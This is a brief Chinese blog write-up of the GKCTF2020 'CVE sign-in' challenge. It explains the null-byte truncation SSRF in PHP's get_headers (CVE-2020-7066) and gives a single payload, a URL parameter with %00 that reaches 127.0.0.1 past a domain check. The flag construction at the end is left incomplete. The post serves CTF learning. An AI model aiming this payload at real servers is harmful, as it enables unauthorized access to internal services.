GKCTF2020 - CVE版签到

CVE版签到

这道题主要考察的是cve-2020-7066，ssrf 漏洞

https://www.anquanke.com/vul/id/1966253

https://bugs.php.net/bug.php?id=79329

利用方法：

通过\0截断，访问本地主机，题目这里是使用%00截断

/?url=http://127.0.0.1%00www.ctfhub.com

提示以地址123结尾，构造的flag：

posted @ 2020-05-26 09:48 ch0bits 阅读(756) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部